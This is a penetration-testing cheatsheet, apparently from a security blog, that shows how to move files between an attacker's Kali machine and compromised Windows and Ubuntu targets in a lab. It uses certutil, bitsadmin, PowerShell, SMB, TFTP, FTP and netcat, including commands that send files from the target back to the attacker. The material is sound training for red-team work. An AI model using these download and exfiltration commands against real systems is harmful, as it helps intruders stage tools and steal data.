Penetration Testing

File Transfer Cheatsheet: Windows and Linux

File transfer is a crucial step in the post-exploitation scenario while performing penetration testing or red teaming. There are various ways to do the file transfer, here in this article we are going to show them one by one.

Table of Contents

  • Lab setup
  • File transfer using wget
  • File transfer using curl
  • File transfer using certutil
  • File transfer using bitsadmin
  • File transfer using PowerShell
  • File transfer using SMB server
  • File transfer using SCP
  • File transfer using TFTP
  • File transfer using FTP
  • Different methods to setup the server for file transfer
  • File transfer using Netcat
  • Conclusion

Lab setup

Here we are going to perform the file transfer assuming we have already compromised the target machine and we have an initial shell access.

Attacker Machine: Kali Linux (192.168.31.141)

Target Machine 1: Windows 10 (192.168.31.219)

Target Machine 2: Ubuntu

Inside the attacker’s machine, we will setup an updog server. It is a replacement of the Python’s SimpleHTTPServer. It is useful for scenarios where a lightweight, quick-to-deploy HTTP server is needed.

To install the server, we will execute the following command:

pip3 install updog

After the installation is complete, we can run the server at port 80 using the following command:

updog -p 80

wget

To transfer the file, we can use the wget command. wget is a powerful command to download files from the web. It should be noted that while doing file transfer using wget in windows, we need to mention the -o (-OutFile) flag in order to save the file. If we do not mention the flag then it will only return it as an object i.e., WebResponseObject. The command for wget in windows is:

powershell wget http://192.168.31.141/ignite.txt -o ignite.txt
dir
type ignite.txt

curl

Curl is a powerful command-line tool, which can be used to transfer files using various networking protocols. Following will be the command to transfer the file:

curl http://192.168.31.141/ignite.txt -o ignite.txt

certutil

certutil is a command-line utility included with the Windows operating system, designed for managing certificates and cryptographic elements. To transfer the file using certutil following command can be used:

certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

The -split option in certutil is used to split large files into smaller segments to perform the file transfer.

certutil -urlcache -split -f http://192.168.31.141/ignite.txt ignite.txt

bitsadmin

Bitsadmin is a command-line utility for handling Background Intelligent Transfer Service (BITS) tasks in Windows. It facilitates different file transfer operations, including downloading and uploading files. The command for file transfer is:

bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\Public\ignite.txt

It can be seen that the file is successfully transferred after the command is executed.

File transfer using PowerShell

File transfer can be performed using PowerShell directly by running the following command:

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

File transfer using SMB server

SMB is a protocol meant for communication to provide shared access to files, ports etc. within a network. In order to enable it we will use the impacket-smbserver script inside kali linux to share the files. Here we are giving the shared directory name as share, the significance of the share here is that it converts the file’s long path into a single share directory. Here we can give the full path of directory or the pwd as argument so that it takes the current directories path.

impacket-smbserver share $(pwd) -smb2support

After the setup is done, we can execute the following command in the Windows machine to copy the files from the share folder.

copy \\192.168.31.141\share\ignite.txt

To copy the file from Windows into our kali linux, we can use the following command:

copy ignite.txt \\192.168.31.141\share\ignite.txt

In order to transfer file from another linux machine like ubuntu, we can connect with the share folder using the smbclient tool and then after login, we can directly upload and download the file using put and get commands respectively.

smbclient -L 192.168.31.141
smbclient "\\\\192.168.31.141\share"
ls
get ignite.txt
put data.txt

File transfer using SCP

SCP (Secure Copy Protocol) is a method for securely transferring files between a local system and a remote server, or between two remote servers. It operates over the SSH (Secure Shell) protocol, which ensures a secure connection over potentially insecure networks. It has the advantage of cross-platform usage such that it is supported by both linux and windows.

To copy the file from Windows to kali, we will be using the following command:

scp ignite.txt kali@192.168.31.141:/tmp

To transfer the file from kali linux to the windows machine, we will use the following command:

scp ignite.txt raj@192.168.31.219:/C:/Temp

File transfer using TFTP

TFTP (Trivial File Transfer Protocol) is a basic and minimalistic protocol for file transfers over a network. It operates over the UDP rather than TCP, this choice helps keep the protocol lightweight but means it does not provide the reliability and error-checking that TCP offers. It works on UDP port 69.

To transfer a file from kali linux to windows machine, we will be using the following command inside the Metasploit framework:

use auxiliary/server/tftp
set srvhost 192.168.31.141
set tftproot /root/raj
run

To download the file, we will run the following command in windows machine:

tftp -i 192.168.31.219 GET ignite.txt
dir

File transfer using FTP

FTP (File Transfer Protocol) is a longstanding and widely utilized protocol for transferring files across a network. It enables users to upload, download, and manage files on a remote server. To enable the FTP service, we are going to use the Metasploit framework. It can be noted that here we are keeping an authentication on the service rather than keeping the anonymous login.

Following will be the commands:

use auxiliary/server/ftp
set srvhost 192.168.31.141
set ftproot /root/raj
set ftpuser raj
set ftppass 123
run

Once the server is started, the file can be downloaded after authenticating into the FTP server.

ftp 192.168.31.141
dir
get ignite.txt

We can also use the python FTP server using the pyftpdlib. It is a library of python which helps us to setup the FTP server on the machine. Here we will be using it to setup a FTP server on the kali machine.

First we will start with the installation using pip3.

pip3 install pyftpdlib

After the installation is complete, we can start the FTP server using the authentication by the following command:

python3 -m pyftpdlib -w -p 21 -u ignite -P 123

Once the server is started we can authenticate into the FTP server from the windows machine and download the file. To upload the file we will use the put command and to download the file we will use the get command.

ftp 192.168.31.141
get ignite.txt
put C:\Users\raj\avni.txt

To setup FTP server for Anonymous login, we will run the same command but without the username and password.

python -m pyftpdlib -w -p 21

Once the server is enabled for Anonymous login, we can perform it and view the files.

ftp 192.168.31.141
ls

Different methods to setup the server for file transfer

To perform the file transfer we need to setup a server, besides using updog.

To setup a server using PHP, we can use the following command:

php -S 0.0.0.0:8081

To setup a server using python2, we can use the following command:

python2 -m SimpleHTTPServer 80

To setup a server using python3, we can use the following command:

python3 -m http.server 8000

File transfer using Netcat

Netcat, commonly known as nc, is a multifunctional networking tool designed for reading from and writing to network connections over TCP or UDP. Netcat can facilitate file transfers by establishing a simple client-server setup.

To transfer file in the kali machine from an Ubuntu machine we can use the following command inside kali:

nc -lvp 5555 > file.txt

Now we can run the following command in ubuntu to send the file to the kali machine:

ls
nc 192.168.31.141 5555 < file.txt

Similarly, we can also receive files from a windows machine inside our kali linux. However, it should be noted that we the target windows machine should have the nc.exe binary to make this method work.

Following is the command we need to run on the windows machine:

nc.exe 192.168.31.141 5555 < data.txt

To receive the file in the kali machine, we will run the following command:

nc -lvp 5555 > data.txt
cat data.txt

Conclusion

As we have seen that there are various methods to transfer the file from out machine to target system and vice versa. It depends on one’s choice and circumstances to use the appropriate tool for the file transfer.

Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant. Contact here